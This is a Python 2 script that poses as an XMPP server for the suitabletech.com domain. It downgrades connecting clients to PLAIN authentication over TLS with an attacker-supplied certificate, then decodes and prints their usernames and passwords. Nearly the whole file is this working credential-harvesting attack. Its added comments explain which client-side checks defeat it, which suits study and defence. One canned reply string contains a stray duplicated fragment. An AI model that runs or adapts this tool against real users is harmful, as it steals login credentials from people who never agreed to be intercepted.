#!/usr/bin/env python
import sys, socket, thread, ssl, re, base64
# Listener configuration. Binding to 0.0.0.0 accepts connections on every
# local interface; 5222 is the standard XMPP client-to-server port.
HOST = '0.0.0.0'
PORT = 5222
# Maximum bytes read per recv() call; a single XMPP stanza larger than this
# would be truncated (no reassembly is done anywhere below).
BUFFER = 2048
# Canned XMPP stream responses played back verbatim. message1 is a server
# stream header that claims to be the 'suitabletech.com' domain; a client
# that validates the TLS certificate against that name will not proceed
# past the STARTTLS step below.
message1 = '''<?xml version='1.0'?><stream:stream xmlns:stream='http://etherx.jabber.org/streams' xmlns='jabber:client' from='suitabletech.com' version='1.0' id='yzd6vaewp51cr4pppt8ub8rvuew5x2ev1r1x1gtr'>'''
# Stream features offered after TLS: only the PLAIN SASL mechanism, so the
# client has no stronger (hashed/channel-bound) option to choose.
message2 = '''<stream:features xmlns:stream='http://etherx.jabber.org/streams'><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>'''
# Same feature set plus the <starttls/> advertisement, sent on the
# cleartext stream.
message2tls = '''<stream:features xmlns:stream='http://etherx.jabber.org/streams'><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>'''
# The <proceed/> reply to the client's STARTTLS request.
message3 = '''<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>r.org/streams'><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>'''
def mitm_thread(victim, certificate, private_key):
    """Handle one accepted client connection on its own thread.

    Plays a scripted XMPP server handshake: cleartext stream header and
    features, STARTTLS, then a TLS stream that advertises only PLAIN, and
    logs the base64 SASL payload the client replies with. Python 2 code:
    print statements, str sockets, and ssl.wrap_socket (removed in 3.12).

    Defender's note: every step here depends on the client side. The
    connection only reaches the credential stage if the client accepts
    the certificate loaded from `certificate`/`private_key` for the
    domain named in message1 (no validation or pinning) and agrees to
    PLAIN instead of insisting on a hashed/channel-bound mechanism.
    Clients that enforce either check abort inside the inner try below.

    Args:
        victim: connected plaintext socket returned by accept().
        certificate: path to the PEM certificate presented to the client.
        private_key: path to the matching private key.

    Returns:
        None. All errors are printed and the socket is closed.
    """
    try:
        # Receive initial message from client (its opening <stream:stream>)
        pkt = victim.recv(BUFFER)
        print "# Received from victim: %s" % pkt.rstrip()
        # Send initial message and starttls with PLAIN
        victim.send(message1)
        victim.send(message2tls)
        # Receive STARTTLS (contents are not inspected; any reply proceeds)
        pkt = victim.recv(BUFFER)
        print "# Received from victim: %s" % pkt.rstrip()
        # Proceed!
        victim.send(message3)
        print "# Victim connection switched to TLS"
        # Server-side TLS on the same socket. suppress_ragged_eofs=False
        # turns an unclean close by the client into an exception, which
        # lands in the inner except below.
        ssl_socket = ssl.wrap_socket(victim, server_side=True, suppress_ragged_eofs=False, certfile=certificate, keyfile=private_key)
        try:
            # Client restarts the stream after TLS; read its new header.
            pkt = ssl_socket.recv(BUFFER)
            print "# Received from victim: %s" % pkt.rstrip()
            # Send initial message and PLAIN
            ssl_socket.send(message1)
            ssl_socket.send(message2)
            # We should now receive the credentials base64-encoded
            authblock = ssl_socket.recv(BUFFER)
            print "# Received from victim: %s" % authblock.rstrip()
            # An empty read means the client closed the TLS stream, which
            # is what a client that rejects the certificate or the PLAIN
            # offer does.
            if authblock != '':
                # No match (e.g. a non-<auth> stanza) makes .group() raise
                # AttributeError, handled by the inner except.
                credentials_xml = re.search('>(.+)</auth>',authblock).group(1)
                # SASL PLAIN payload is NUL-separated: authzid, authcid,
                # password — hence indexes 1 and 2 below.
                credentials = base64.b64decode(credentials_xml).split('\x00')
                print "# Found credentials.\n Username: %s\n Password: %s" % (credentials[1],credentials[2])
                victim.close()
            else:
                print "Something went wrong with our TLS certificate"
                ssl_socket.close()
        except Exception as e:
            print "Error inside our TLS socket: ", e
            ssl_socket.close()
            return
    except Exception as e:
        # Covers the cleartext phase and the wrap_socket handshake itself.
        print "Error:", e
        victim.close()
if __name__=='__main__':
    # Exactly two positional arguments: certificate and key file paths,
    # passed through to ssl.wrap_socket in mitm_thread.
    if len(sys.argv) != 3:
        sys.exit('Usage: %s <certificate> <private_key>\nExample: %s suitabletech.com.pem suitabletech.com.key' % (sys.argv[0], sys.argv[0]))
    certificate = sys.argv[1]
    private_key = sys.argv[2]
    # Plain TCP listener on all interfaces, port 5222. The script does
    # not redirect anything itself: only clients whose connections
    # already arrive at this host are affected.
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((HOST, PORT))
    server.listen(2)
    print "Started fake XMPP Server on port %s" % PORT
    try:
        while True:
            # One detached thread per connection (Python 2 `thread`
            # module); threads are never joined, so an in-flight handler
            # is simply abandoned when the listener is closed below.
            victim, address = server.accept()
            print "New Victim connected: %s" % address[0]
            thread.start_new_thread(mitm_thread, (victim, certificate, private_key))
    except KeyboardInterrupt:
        server.close()